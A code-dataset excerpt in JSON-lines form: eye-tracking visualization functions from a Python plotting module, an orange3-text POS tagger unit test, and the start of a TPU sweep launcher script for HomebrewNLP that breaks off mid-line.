poly_image.putalpha(ImageEnhance.Brightness(poly_alpha).enhance(alpha))\n\n # Blend circles on to screen image with alpha\n return Image.composite(poly_image, screen_image, poly_image)\n\ndef highlight_code(code, lexer=None, formatter=None, filename=None,\n style=\"default\", font_name=None, font_size=19,\n image_pad=10, line_pad=8, line_numbers=False):\n \"\"\"Highlights Python code using Pygments.\n \n Parameters\n ----------\n code : str\n Code string to highlight\n\n lex : Pygments lexer or None, optional\n Lexer to use or None for python lexer (default: None)\n\n fmt : Pygments formatter or None, optional\n Formatter to use or None for png formatter with options\n specified by arguments below (default: None)\n\n style : str\n Highlighting style (default: 'default')\n\n font_name : str\n Name of font to use (default: 'Droid Sans Mono')\n\n font_size : int\n Size of font to use in points (default: 19)\n\n image_pad : int\n Padding around image in pixels (default: 10)\n\n line_pad : int\n Extra padding for new lines in pixels (default: 10)\n\n line_numbers : bool\n True if Pygments should add line numbers (default: False)\n\n Returns\n -------\n img : PIL Image\n Image with highlighted code\n \n \"\"\"\n\n import pygments\n from pygments import formatters, lexers\n if lexer is None:\n msg = \"filename is required if no lexer is provided\"\n assert filename is not None, msg\n lexer = pygments.lexers.guess_lexer_for_filename(filename, code)\n\n # Create lexer and formatter if not provided\n formatter = formatter or formatters.get_formatter_by_name(\"png\",\n style=style, font_name=font_name,\n font_size=font_size, line_numbers=line_numbers,\n image_pad=image_pad, line_pad=line_pad)\n\n # Highlight code\n if not isinstance(code, str):\n # Convert to a single string\n code = \"\\n\".join([line.rstrip() for line in code])\n\n png_data = pygments.highlight(code, lexer, formatter)\n\n # Convert to PIL Image\n code_image = Image.open(StringIO(png_data))\n return code_image\n\ndef line_code_image(line_fixes, code_image, num_lines, method=\"time\",\n image_padding=10, image_dpi=120, bar_height=0.75, bar_mult=1.0,\n width_inches=5, color=None, horiz_sep=0,\n line_numbers=False, **kwargs):\n \"\"\"Plots fixation information as bars next to code lines.\n \n Parameters\n ----------\n line_fixes : pandas DataFrame\n DataFrame with one fixation per row + line annotation. Must have\n columns start_ms, duration_ms, line.\n\n code_image : PIL Image\n Image with highlighted code (see plot.hightlight_code)\n\n num_lines : int\n Number of lines in the code\n\n method : str or callable, optional\n Method for determining size of line bars. May be one of:\n * 'time' - total fixation duration\n * 'count' - number of fixations\n * 'first' - time of first fixation\n or a callable with 2 argments (frame, lines) where\n * frame is the line_fixes DataFrame\n * lines is a list of line numbers\n that returns a list of bar heights for each line.\n Default is 'time'.\n\n image_padding : int, optional\n Padding expected around image in pixels (default: 10) \n\n image_dpi : int, optional\n Dots per inch for final rendered image\n\n bar_height : float, optional\n Height (or thickness) of horizontal bars (default: 0.75)\n\n bar_mult : float, optional\n Factor to multiply bars' vertical positions by (default: 1.0)\n\n width_inches : float, optional\n Width of final rendered image in inches\n\n color : str or None, optional\n Color of bars or None for automatic selection\n\n horiz_sep : int, optional\n Separation between bars and code image in pixels (default: 0)\n\n **kwargs : keyword arguments\n Arguments passed through to matplotlib barh function\n\n Returns\n -------\n img : PIL Image\n Image with bars and code combined\n \n \"\"\"\n\n assert num_lines > 0, \"Must have more than 0 lines\"\n\n # Check for known methods (time, count, first)\n if method == \"time\":\n # Total fixation duration per line\n method = lambda frame, lines: [sum(frame[frame.line == line].duration_ms) for line in lines]\n color = color or kelly_colors[0]\n elif method == \"count\":\n # Number of fixations per line\n method = lambda frame, lines: [sum(frame.line == line) for line in lines]\n color = color or kelly_colors[1]\n elif method == \"first\":\n # Time of first fixation per line\n method = lambda frame, lines: [frame[frame.line == line].start_ms.min() for line in lines]\n color = color or kelly_colors[2]\n\n lines = np.arange(1, num_lines + 1)\n \n # Plot bar graph with no axes or labels\n height_inches = (code_image.size[1] - (image_padding * 2)) / float(image_dpi)\n\n if line_numbers:\n # Leave a little room for the line numbers\n fig, ax = pyplot.subplots(figsize=(width_inches, height_inches), dpi=image_dpi)\n ax.set_position([0, 0, 0.9, 1])\n ax.set_frame_on(False)\n else:\n # Take the entire figure space\n fig = pyplot.figure(figsize=(width_inches, height_inches), dpi=image_dpi)\n ax = pyplot.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n\n ax.barh(lines * bar_mult, method(line_fixes, lines), height=bar_height,\n color=color, **kwargs)\n\n # Show every line\n ax.set_yticks(0.5 + lines)\n \n # Don't include line 0\n ax.set_ylim(1, num_lines + 1)\n \n # Lines start at 1 on top\n ax.invert_yaxis()\n \n # Bars go from right to left\n ax.invert_xaxis()\n\n if line_numbers:\n # Put line numbers on the right\n ax.set_yticklabels(np.arange(1, num_lines + 1))\n ax.yaxis.tick_right()\n\n # Align line number labels\n for label in ax.yaxis.get_ticklabels():\n label.set_verticalalignment(\"center\")\n \n # Hide tick lines\n for tic in it.chain(ax.xaxis.get_major_ticks(),\n ax.yaxis.get_major_ticks()):\n tic.tick1On = False\n tic.tick2On = False\n\n # Combine with code image\n plot_buffer = StringIO()\n fig.savefig(plot_buffer, format=\"png\", dpi=image_dpi)\n pyplot.close(fig)\n plot_buffer.pos = 0\n plot_image = Image.open(plot_buffer)\n \n # Create combined image\n master_width = plot_image.size[0] + horiz_sep + code_image.size[0]\n master_image = Image.new(\"RGBA\", (master_width, code_image.size[1]),\n (255, 255, 255, 255))\n\n # Paste bar plot (left) and code (right)\n master_image.paste(plot_image, (0, image_padding))\n master_image.paste(code_image, (plot_image.size[0] + horiz_sep, 0))\n\n return master_image\n\n\ndef fix_timeline(line_fixes, num_lines, output_fixes=None,\n ax=None, figsize=None, barebones=False):\n \"\"\"Plots a timeline of line fixations by seconds.\n\n Parameters\n ----------\n line_fixes : pandas DataFrame\n DataFrame with one fixation per row + line annotation. Must have\n columns start_ms, end_ms, line.\n\n num_lines : int\n Number of lines in the program\n\n output_fixes : pandas DataFrame or None, optional\n DataFrame with fixations on the output box (interface kind).\n If None, only line fixations are displayed (default: None).\n\n ax : matplotlib Axes or None, optional\n An Axes to plot onto or None to create a new one (default: None)\n\n figsize : tuple or None, optional\n Size of figure in inches when creating new Axes (width, height).\n If None, default figsize is used (default: None).\n\n Returns\n -------\n ax : matplotlib Axes\n Axes with timeline plotted on top\n \n \"\"\"\n assert num_lines > 0, \"Must have more than 0 lines\"\n \n # Gather list of times and line numbers (output box is line 0)\n times_lines = dict(list(line_fixes[[\"start_ms\", \"line\"]].values) +\n list(line_fixes[[\"end_ms\", \"line\"]].values))\n\n if output_fixes is not None:\n times_lines.update(dict([(t, 0) for t in output_fixes.start_ms] +\n [(t, 0) for t in output_fixes.end_ms]))\n \n sorted_times = sorted(times_lines.keys())\n sorted_lines = [times_lines[k] for k in sorted_times]\n max_time = max(sorted_times)\n \n # Plot fixation lines and points\n if ax is None:\n if figsize is None:\n fig_width = int(np.ceil(max_time / 1000.0 / 2))\n fig_height = int(np.ceil((num_lines + 1) / 2.0))\n figsize = (fig_width, fig_height)\n pyplot.figure(figsize=figsize)\n ax = pyplot.axes()\n\n ax.plot(sorted_times, sorted_lines, linewidth=2)\n if not barebones:\n ax.scatter(sorted_times, sorted_lines, marker=\"o\", alpha=0.5, color=\"red\", s=50)\n ax.grid()\n ax.set_title(\"Fixations By Line\")\n \n # Line 1 is at the top (output box is above it)\n if output_fixes is not None:\n lines = np.arange(0, num_lines + 1)\n ax.set_yticks(lines)\n ax.set_ylim(-0.5, num_lines + 0.5)\n if not barebones:\n ax.set_yticklabels([\"Output\\nTextbox\"] + [str(l) for l in lines[1:]])\n\n # Separate output box from other lines\n ax.axhline(0.5, color=\"black\", linestyle=\"--\", linewidth=2)\n else:\n lines = np.arange(1, num_lines + 1)\n ax.set_ylim(0.5, num_lines + 0.5)\n ax.set_yticks(lines)\n if not barebones:\n ax.set_yticklabels(lines)\n\n if not barebones:\n ax.set_ylabel(\"Line\")\n ax.invert_yaxis()\n \n # Show time in seconds instead of millis\n ax.xaxis.set_major_formatter(FuncFormatter(lambda x, pos: int(x / 1000)))\n ax.xaxis.set_major_locator(MultipleLocator(1000))\n ax.set_xlim(-500, max_time + 1000)\n if not barebones:\n ax.set_xlabel(\"Time (seconds)\")\n else:\n ax.set_frame_on(False)\n ax.set_xticklabels([])\n ax.set_xticks([])\n ax.set_yticklabels([])\n ax.set_yticks([])\n \n return ax\n\n# }}}\n\n# Metric plots {{{\n\ndef rolling_metrics(results, columns=None, names=None, colors=None,\n markersize=5, ax=None, figsize=None):\n from matplotlib.ticker import MultipleLocator, FormatStrFormatter, FuncFormatter\n\n if columns is None:\n columns = [results.columns[0]]\n\n fig = None\n if ax is None:\n fig = pyplot.figure(figsize=figsize)\n ax = pyplot.axes()\n else:\n fig = ax.figure\n \n axes = [ax] + [ax.twinx() for c in columns[1:]]\n\n if colors is None:\n colors = [\"r\", \"g\", \"b\", \"y\", \"purple\", \"orange\", \"black\"]\n colors = it.cycle(colors)\n\n if names is None:\n names = columns\n elif isinstance(names, str):\n names = [names]\n \n if len(columns) > 2:\n fig.subplots_adjust(left=0, right=0.75)\n axes[2].spines['right'].set_position(('axes', 1.1))\n axes[2].set_frame_on(True)\n axes[2].patch.set_visible(False)\n \n # Plot left y-axis\n color = next(colors)\n axes[0].plot(results.index, results[columns[0]], color=color, marker=\"o\",\n markersize=markersize, label=names[0])\n axes[0].set_ylabel(names[0], color=color)\n axes[0].tick_params(axis=\"y\", colors=color)\n \n if len(columns) > 1:\n # Plot right y-axis\n color = next(colors)\n axes[1].plot(results.index, results[columns[1]], color=color, marker=\"*\",\n markersize=markersize, label=names[1])\n axes[1].set_ylabel(names[1], color=color)\n axes[1].tick_params(axis=\"y\", colors=color)\n \n if len(columns) > 2:\n color = next(colors)\n axes[2].plot(results.index, results[columns[2]], color=color, marker=\"^\",\n markersize=markersize, label=names[2])\n axes[2].set_ylabel(names[2], color=color)\n axes[2].tick_params(axis=\"y\", colors=color)\n \n # Adjust x-axis to seconds\n ax.set_xlabel(\"Time (sec)\")\n ax.xaxis.set_major_formatter(FuncFormatter(lambda x, pos: str(int(x) / 1000)))\n ax.xaxis.set_major_locator(MultipleLocator(5000))\n for label in ax.get_xticklabels():\n label.set_rotation(90)\n \n return ax\n\ndef find_font(name=\"monospace\"):\n from matplotlib import font_manager\n return font_manager.findfont(name)\n\ndef text_size(font_path, font_size, text=\"|\"):\n from PIL import Image, ImageDraw, ImageFont\n font = ImageFont.truetype(font_path, font_size)\n draw = ImageDraw.Draw(Image.new(\"1\", (1, 1)))\n size = draw.textsize(text, font=font)\n del draw\n return size\n\ndef draw_code(code, font_path=None, font_size=18,\n font=None, image=None, line_offset=5, offset=(0, 0),\n padding=(0, 0), fill=\"black\", bg_color=\"white\"):\n \"\"\"Renders code on to a background image with a given font and spacing.\n \n Parameters\n ----------\n code : str or list\n Code to render as a string or a list of lines. If a str, the code will\n by split by '\\\\n'.\n\n font_path : str, optional\n Path to a truetype font for rendering the code. If None and font is not\n provided, the system's default monospace font will be used (default:\n None).\n\n font_size : int, optional\n Size of font in pixels (default: 18).\n\n font : PIL ImageFont, optional\n Font to use for rendering. If provided, font_path is ignored (default:\n None).\n\n image : PIL.Image, optional\n Background image behind rendered code. If None, a new image is created\n to contain the rendered lines and filled with bg_color (default: None).\n\n line_offset : int, optional\n Number of pixels between lines of code (default: 5).\n\n offset : tuple of int, optional\n Horizontal and vertical offset from top-left corner for rendered code\n in pixels (default: (0, 0)).\n\n padding : tuple of int, optional\n Symmentric horizontal and vertical padding around rendered code if\n background image is not provided (default: (0, 0)).\n\n fill : str, optional\n Fill color for rendered code (default: 'black').\n\n bg_color : str, optional \n Fill color for background if background image is not provided (default:\n 'white').\n \n Returns\n -------\n code_image : PIL.Image\n Image with code rendered on top of background.\n\n Notes\n -----\n Requires the PIL image library: http://www.pythonware.com/products/pil/\n \n \"\"\"\n from PIL import Image, ImageDraw, ImageFont\n\n if font is None:\n if font_path is None:\n # Look up system monospace font\n font_path = find_font()\n font = ImageFont.truetype(font_path, font_size)\n\n # If code is a string, split into lines\n if isinstance(code, str):\n lines = code.split(\"\\n\")\n else:\n lines = code\n\n # Create background image to fit rendered code\n if image is None:\n temp_image = Image.new(\"RGB\", (1, 1))\n draw = ImageDraw.Draw(temp_image)\n max_x, max_y = offset\n for line in lines:\n line_size = draw.textsize(line.rstrip(), font=font)\n max_x = max(max_x, offset[0] + line_size[0])\n max_y += font_size + line_offset\n\n max_x = int(np.ceil(max_x)) + padding[0]\n max_y = int(np.ceil(max_y)) + padding[1]\n image = Image.new(\"RGB\", (max_x + 1, max_y + 1), bg_color)\n del draw, temp_image\n\n draw = ImageDraw.Draw(image)\n\n # Draw code text onto background image\n y = offset[1]\n for i, line in enumerate(lines):\n x = offset[0]\n draw.text((x, y), line.rstrip(), font=font, fill=fill)\n y += font_size + line_offset\n\n del draw\n return image\n\n# }}}\n\n\ndef correlation_matrix(frame, cols, ax=None, figsize=None,\n label_size=\"small\", alpha=0.05, label_threshold=0.2,\n add_legend=True, method=\"spearman\"):\n if ax is None:\n fig, ax = pyplot.subplots(1, 1, figsize=figsize)\n\n title = \"\"\n if isinstance(method, str):\n title = method.capitalize() + \" \"\n\n ax.set_title(\"{0}Correlation Matrix ({1} columns)\".format(title, len(cols)))\n\n corr2d, sig2d = permute_correlation_matrix(frame[cols], method=method)\n text2d = np.empty(shape=(len(cols), len(cols)), dtype=object)\n num_steps = 100\n\n for i, col1 in enumerate(cols):\n for j, col2 in enumerate(cols):\n if i != j:\n r = corr2d[i, j]\n corr2d[i, j] = num_steps + (num_steps * r)\n if sig2d[i, j]:\n text2d[i, j] = \"{0:.0f}\".format(abs(r) * 100)\n if r < 0:\n text2d[i, j] = \"({0})\".format(text2d[i, j])\n else:\n text2d[i, j] = \"\"\n else:\n corr2d[i, j] = np.nan\n\n cdict = { \"blue\" : [(0.0, 0.0, 0.0),\n (0.5, 1.0, 1.0),\n (1.0, 0.0, 0.0)],\n\n \"red\" : [(0.0, 1.0, 1.0),\n (0.5, 1.0, 1.0),\n (1.0, 0.0, 0.0)],\n \n \"green\" : [(0.0, 0.0, 0.0),\n (0.5, 1.0, 1.0),\n (1.0, 1.0, 1.0)]}\n\n cmap = LinearSegmentedColormap(\"heat\", cdict, N=(num_steps * 2))\n masked = np.ma.masked_where(np.isnan(corr2d), corr2d)\n ax.set_axis_bgcolor(\"#CCCCCC\")\n meshes = ax.pcolor(masked, cmap=cmap, edgecolors=\"#000000\", vmin=0, vmax=(num_steps * 2))\n \n for i in range(len(cols)):\n for j in range(len(cols)):\n if (i != j) and text2d[i, j] is not None:\n pyplot.text(i + 0.5, j + 0.5, text2d[i, j],\n horizontalalignment=\"center\",\n verticalalignment=\"center\",\n size=label_size)\n\n fig = ax.figure\n if add_legend:\n cb = fig.colorbar(meshes, ticks=[0, num_steps, num_steps * 2],\n format=pyplot.FixedFormatter([\"-1\", \"0\", \"1\"]))\n\n cb.set_label(\"{0}Correlation (x100)\".format(title))\n\n # Set exact limits\n ax.set_xlim((0, len(cols)))\n ax.set_ylim((0, len(cols)))\n\n # Label columns\n loc = pyplot.FixedLocator([0.5 + x for x in range(len(cols))])\n ax.xaxis.set_major_locator(loc)\n ax.yaxis.set_major_locator(loc)\n\n tic = pyplot.FixedFormatter(cols)\n ax.xaxis.set_major_formatter(tic)\n ax.yaxis.set_major_formatter(tic)\n\n pyplot.xticks(rotation=90)\n fig.tight_layout()\n\n return ax\n\ndef super_code_image(fixes, line_fixes, num_lines, screen_img, trial,\n trial_aois, aoi_kind=\"code-grid\", cmap=pyplot.cm.OrRd,\n aoi_alpha=0.7, code_padding=5, line_numbers=False,\n time_between=False, between_cmap=pyplot.cm.binary):\n\n # Crop out code image\n line_aois = trial_aois[(trial_aois.kind == \"line\")]\n env = envelope(line_aois, code_padding).irow(0)\n crop_rect = [env[\"x\"], env[\"y\"], env[\"x\"] + env[\"width\"], env[\"y\"] + env[\"height\"]]\n\n # Hit test against grid AOIs\n grid_aois = trial_aois[(trial_aois.kind == aoi_kind)]\n grid_col = kind_to_col(aoi_kind)\n grid_fixes = fixes.dropna(subset=[grid_col])\n grid_counts = grid_fixes.groupby(grid_col).duration_ms.sum()\n max_grid_count = float(max(grid_counts))\n\n def color_grid(kind, name, local_id):\n rel_count = grid_counts.get(name, default=0) / max_grid_count\n return matplotlib.colors.rgb2hex(cmap(rel_count))\n\n outline_func = None\n if time_between:\n sp = scanpath_from_fixations(grid_fixes, aoi_kind)\n fix_between = time_between_fixes(sp)\n between_means = np.log(fix_between.groupby(\"name\").time_ms.mean())\n min_time_between = float(min(between_means))\n max_time_between = float(max(between_means))\n\n def color_outline(kind, name, local_id):\n rel_time = (between_means.get(name, default=0) - min_time_between) / \\\n (max_time_between - min_time_between)\n return matplotlib.colors.rgb2hex(between_cmap(1 - rel_time))\n\n outline_func = color_outline\n\n # Create syntax-based image\n code_box = trial_aois[(trial_aois.kind == \"interface\") &\n (trial_aois.name == \"code box\")].irow(0)\n aoi_img = draw_rectangles(grid_aois, screen_img, color_func=color_grid,\n alpha=aoi_alpha, outline=outline_func)\n code_img = aoi_img.crop(crop_rect)\n\n # Compute line colors based on their associated block fixation times\n block_fixes = fixes.dropna(subset=[kind_to_col(\"block\")])\n block_counts = block_fixes.groupby(\"hit_id_block\").duration_ms.sum()\n block_aois = trial_aois[(trial_aois.kind == \"block\")]\n max_block_count = float(max(block_counts))\n\n colors = [\"w\"] * num_lines\n for idx, row in line_aois.iterrows():\n # Compute associated block for line\n line_num = int(row[\"name\"].split(\" \")[1])\n line_block = block_aois[(row[\"y\"] >= block_aois[\"y\"]) &\n (row[\"y\"] < (block_aois[\"y\"] + block_aois[\"height\"]))]\n\n if len(line_block) > 0:\n # Extract fixation counts for this block and compute color\n block_id = line_block.irow(0)[\"local_id\"]\n rel_count = block_counts.get(block_id, default=0) / max_block_count\n colors[line_num - 1] = matplotlib.colors.rgb2hex(cmap(rel_count))\n \n # Create final image combining lines, blocks, and syntax fixation counts\n return line_code_image(line_fixes, code_img, num_lines, color=colors,\n image_padding=3, bar_height=0.85, bar_mult=1.001, horiz_sep=5,\n method=\"time\", line_numbers=line_numbers)\n\ndef aoi_code_image(fixes, screen_img,\n trial_aois, kind=\"code-grid\", cmap=pyplot.cm.OrRd,\n syntax_alpha=0.7, code_padding=5):\n\n # Crop out code image\n line_aois = trial_aois[(trial_aois.kind == \"line\")]\n env = envelope(line_aois, code_padding).irow(0)\n crop_rect = [env[\"x\"], env[\"y\"], env[\"x\"] + env[\"width\"], env[\"y\"] + env[\"height\"]]\n\n # Hit test against grid AOIs\n col = kind_to_col(kind)\n code_aois = trial_aois[(trial_aois.kind == kind)]\n code_fixes = fixes.dropna(subset=[col])\n code_counts = code_fixes.groupby(col).duration_ms.sum()\n max_code_count = float(max(code_counts))\n\n def color_grid(kind, name, local_id):\n rel_count = code_counts.get(name, default=0) / max_code_count\n return matplotlib.colors.rgb2hex(cmap(rel_count))\n\n # Create syntax-based image\n code_box = trial_aois[(trial_aois.kind == \"interface\") &\n (trial_aois.name == \"code box\")].irow(0)\n aoi_img = draw_rectangles(code_aois, screen_img, color_func=color_grid,\n alpha=syntax_alpha, outline=None)\n code_img = aoi_img.crop(crop_rect)\n\n # Add colorbar\n dpi = 90\n width, height = (0.25 * dpi), code_img.size[1]\n width_inches = width / float(dpi)\n height_inches = height / float(dpi)\n\n fig = pyplot.figure(figsize=(width_inches, height_inches), dpi=dpi, frameon=False)\n ax = pyplot.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n\n norm = matplotlib.colors.Normalize(vmin=min(code_counts),\n vmax=max_code_count)\n\n cb = matplotlib.colorbar.ColorbarBase(ax, cmap=cmap, norm=norm)\n #cb.set_label(\"Total Fixation Duration (ms)\")\n cb.outline.set_linewidth(0)\n\n # Convert plot to image\n plot_buffer = StringIO()\n fig.savefig(plot_buffer, format=\"png\", dpi=dpi)\n pyplot.close(fig)\n plot_buffer.pos = 0\n plot_img = Image.open(plot_buffer)\n\n # Combine AOI and colorbar images\n horz_padding = (0.25 * dpi)\n width = int(code_img.size[0] + horz_padding + plot_img.size[0])\n height = int(code_img.size[1])\n final_img = Image.new(\"RGBA\", (width, height), color=\"white\")\n final_img.paste(code_img, (0, 0))\n final_img.paste(plot_img, (int(horz_padding + code_img.size[0]), 0))\n\n return final_img\n\n\ndef fixation_heatmap(fixations, screen_image, alpha=0.7,\n dot_size=200, cmap=None, dpi=90):\n points = fixations[[\"fix_x\", \"fix_y\"]].values\n heatmap_data = make_heatmap(points, screen_image.size, dot_size)\n\n width, height = screen_image.size\n width_inches = width / float(dpi)\n height_inches = height / float(dpi)\n\n fig = pyplot.figure(figsize=(width_inches, height_inches), dpi=dpi, frameon=False)\n ax = pyplot.Axes(fig, [0, 0, 1, 1])\n ax.set_axis_off()\n fig.add_axes(ax)\n\n if cmap is None:\n cmap = pyplot.cm.get_cmap(\"jet\")\n cmap._init()\n alphas = np.abs(np.linspace(-1.0, 1.0, cmap.N))\n cmap._lut[:-3, -1] = alphas\n\n ax.imshow(heatmap_data.T, interpolation=\"none\", cmap=cmap)\n plot_buffer = StringIO()\n fig.savefig(plot_buffer, format=\"png\", dpi=dpi)\n pyplot.close(fig)\n plot_buffer.pos = 0\n heatmap_image = Image.open(plot_buffer)\n\n heatmap_alpha = heatmap_image.split()[3]\n heatmap_image.putalpha(ImageEnhance.Brightness(heatmap_alpha).enhance(alpha))\n\n return Image.composite(heatmap_image, screen_image, heatmap_image)\n\ndef join_vertical(images, fill=\"white\", spacing=10, line_width=1, line_color=\"black\"):\n width = max([img.size[0] for img in images])\n height = sum([img.size[1] for img in images]) + \\\n (spacing * (len(images) - 1)) + \\\n (line_width * (len(images) - 1))\n\n final_img = Image.new(\"RGBA\", (width, height), color=fill)\n\n # Paste images\n y = 0\n for img in images:\n final_img.paste(img, (0, y))\n y += img.size[1] + spacing + line_width\n\n # Draw lines\n draw = ImageDraw.Draw(final_img)\n y = 0\n for img in images:\n start_y = y\n y += img.size[1] + (spacing / 2) - (line_width / 2)\n draw.line((0, y, width, y), fill=line_color, width=line_width)\n y = start_y + img.size[1] + spacing + line_width\n\n del draw\n return final_img\n\n\ndef saccade_angle_plot(saccades, size=50, color=\"blue\",\n figsize=None, alpha=0.5):\n\n max_dist = float(saccades[\"dist_euclid\"].max())\n fig = pyplot.figure(figsize=figsize)\n ax = pyplot.subplot(111, polar=True)\n\n angles = []\n thetas = []\n for _, row in saccades.iterrows():\n x1, y1 = row[\"sacc_x1\"], row[\"sacc_y1\"]\n x2, y2 = row[\"sacc_x2\"], row[\"sacc_y2\"]\n dist = row[\"dist_euclid\"]\n\n angle = angle_between((x2 - x1, y1 - y2), (1, 0))\n if y1 < y2:\n angle = (2 * np.pi) - angle\n\n angles.append(angle)\n thetas.append(dist / max_dist) \n\n ax.scatter(angles, thetas, s=size, alpha=alpha, color=color)\n ax.set_yticklabels([])\n ax.set_ylim((0, 1.05))\n\n return ax\n\n#def saccade_angle_plot(saccades, size=250, color=\"blue\", bgcolor=\"white\",\n #outline=\"black\", center_color=\"white\", center_radius=2):\n #w, h = size, size\n #max_dist = saccades[\"dist_euclid\"].max()\n #scale = w / (2.0 * max_dist)\n\n #img = Image.new(\"RGBA\", (w, h), bgcolor)\n #draw = ImageDraw.Draw(img)\n #draw.ellipse((2, 2, w - 2, h - 2), outline=outline)\n\n #for _, row in saccades.iterrows():\n #x1, y1 = row[\"sacc_x1\"], row[\"sacc_y1\"]\n #x2, y2 = row[\"sacc_x2\"], row[\"sacc_y2\"]\n #dist = row[\"dist_euclid\"]\n #x = float(x2 - x1) * scale\n #y = float(y2 - y1) * scale\n #draw.line((w/2, h/2, w/2 + x, h/2 + y), fill=color)\n\n #if center_color is not None:\n #r = center_radius\n #draw.ellipse((w/2 - r, h/2 - r, w/2 + r, h/2 + r), fill=center_color)\n #del draw\n #return img\n\ndef transition_centrality_graph(trans_matrix, name_map=None,\n cmap=None, edge_cmap=None, node_size=1200, font_size=18,\n figsize=(10, 10),\n **kwargs):\n import networkx as nx\n graph = nx.DiGraph(trans_matrix)\n\n # Drop orphaned nodes (blank lines)\n for n in graph.nodes():\n if graph.degree(n) == 0:\n graph.remove_node(n)\n\n if name_map is not None:\n graph = nx.relabel_nodes(graph, name_map)\n\n bc = nx.betweenness_centrality(graph)\n sorted_bc = sorted(bc.items(), key=operator.itemgetter(1))\n\n min_bc = sorted_bc[0][1]\n max_bc = sorted_bc[-1][1]\n colors = [bc[n] for n in graph.nodes()]\n\n if cmap is None:\n cdict = {\n \"red\": ((0.0, 0.75, 0.75),\n (1.0, 1.0, 1.0)),\n\n \"green\": ((0.0, 0.0, 0.0),\n (0.75, 1.0, 1.0),\n (1.0, 1.0, 1.0)),\n\n \"blue\": ((0.0, 0.0, 0.0),\n (0.75, 0.0, 0.0),\n (1.0, 0.0, 0.0))\n }\n\n cmap = LinearSegmentedColormap(\"custom\", cdict)\n\n fig = pyplot.figure(figsize=figsize)\n ax = pyplot.Axes(fig, [0, 0, 1, 1])\n fig.add_axes(ax)\n ax.set_axis_off()\n nx.draw_networkx(graph, ax=ax, node_size=node_size,\n node_color=colors, cmap=cmap,\n vmin=min_bc, vmax=max_bc,\n linewidths=1.5, edge_color=\"gray\",\n **kwargs)\n\n return ax\n\ndef trans_steady_state(trans_matrix, name_map=None, ax=None,\n figsize=None, colors=None):\n if ax is None:\n fig, ax = pyplot.subplots(1, 1, figsize=figsize)\n\n if colors is None:\n colors = kelly_colors\n\n ss = steady_state(trans_matrix)\n if name_map is not None:\n names = [name_map[i] for i in range(len(ss))]\n else:\n names = range(len(ss))\n\n pandas.Series(ss, index=names).plot(kind=\"bar\", ax=ax, colors=colors)\n ax.set_title(\"Steady State Probabilities\")\n ax.set_xlabel(\"State\")\n ax.set_ylabel(\"Probability\")\n\n return ax\n","repo_name":"synesthesiam/eyecode","sub_path":"plot/_plot.py","file_name":"_plot.py","file_ext":"py","file_size_in_byte":40705,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"17663875524","text":"import pickle\nimport copy\nimport unittest\n\nfrom orangecontrib.text import tag\nfrom orangecontrib.text.corpus import Corpus\n\n\nclass POSTaggerTests(unittest.TestCase):\n def setUp(self):\n self.tagger = tag.AveragedPerceptronTagger()\n self.corpus = Corpus.from_file('deerwester')\n\n def test_POSTagger(self):\n result = self.tagger(self.corpus)\n self.assertTrue(hasattr(result, 'pos_tags'))\n for tokens, tags in zip(result.tokens, result.pos_tags):\n self.assertEqual(len(tokens), len(tags))\n\n def test_str(self):\n self.assertEqual('Averaged Perceptron Tagger', str(self.tagger))\n\n def test_preprocess(self):\n corpus = self.tagger(self.corpus)\n self.assertIsNotNone(corpus.pos_tags)\n self.assertEqual(len(corpus.used_preprocessor.preprocessors), 2)\n\n def test_can_deepcopy(self):\n copied = copy.deepcopy(self.tagger)\n self.assertTrue(all(\n copied(self.corpus).pos_tags == self.tagger(self.corpus).pos_tags))\n\n def test_can_pickle(self):\n loaded = pickle.loads(pickle.dumps(self.tagger))\n self.assertTrue(all(\n loaded(self.corpus).pos_tags == self.tagger(self.corpus).pos_tags))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"biolab/orange3-text","sub_path":"orangecontrib/text/tests/test_tags.py","file_name":"test_tags.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"52"} +{"seq_id":"12718566168","text":"import argparse\nimport dataclasses\nimport typing\nfrom netrc import netrc\n\nfrom tpucare import delete_all, exec_command, exec_on_tpu, send_to_tpu, start_multiple\n\nfrom src.context import DataContext\n\n_, _, wandb_key = netrc().authenticators(\"api.wandb.ai\")\nOLD_DATA_PATH = DataContext.path.replace(\"/\", \"\\\\/\")[:-1] # remove * at the end\n\n\n@dataclasses.dataclass\nclass Context:\n zone: str\n host: str\n sweep_id: str\n branch: str\n data_path: str\n\n\ndef start_fn(ctx: Context, worker: int):\n setup = f'(bash setup.sh ; sed -i \"s/{OLD_DATA_PATH}/{ctx.data_path}/g\" src/context.py; exit 0)'\n cmd = exec_command(repository=\"https://github.com/HomebrewNLP/HomebrewNLP-Jax\", wandb_key=wandb_key,\n setup_command=setup, run_command=f\"/home/ubuntu/.local/bin/wandb agent {ctx.sweep_id}\",\n branch=ctx.branch)\n send_to_tpu(ctx.host, ctx.zone, \"setup.sh\", cmd, worker)\n exec_on_tpu(ctx.host, ctx.zone, \"bash setup.sh\", worker)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--tpus\", type=int, default=1, help=\"How many TPUs should be launched\")\n parser.add_argument(\"--tpu-version\", type=int, default=3, help=\"Which TPU version to create (v2-8 or v3-8)\")\n parser.add_argument(\"--prefix\", type=str, default=\"homebrewnlp-preemptible-tuning\", help=\"Name prefix for TPUs\")\n parser.add_argument(\"--zone\", type=str, default=\"europe-west4-a\", help=\"GCP Zone TPUs get created in\")\n parser.add_argument(\"--data-path\", type=str, default=\"gs://ggpt4/the-char-pile/\",\n help=\"Where the data is stored. Should be changed to a bucket in the correct region\")\n parser.add_argument(\"--sweep\", type=str, help=\"ID of the Weights and Biases sweep that'll be resumed\")\n parser.add_argument(\"--cleanup\", default=0, type=int,\n help=\"Instead of running something new, kill all tpus. 1 or 0 for y/n\")\n parser.add_argument(\"--preemptible\", default=1, type=int,\n help=\"Whether to create preemptible or non-preemptible TPUs\")\n parser.add_argument(\"--service-account\", type=str,\n help=\"Service account that controls permissions of TPU (for example, to ensure EU TPUs won't \"\n \"use US data)\")\n parser.add_argument(\"--branch\", type=str, help=\"Branch on github to use\")\n parser.add_argument(\"--slices\", type=int, help=\"How many TPU slices each TPU should have (1=>vX-8, 4=>vX-32)\")\n args = 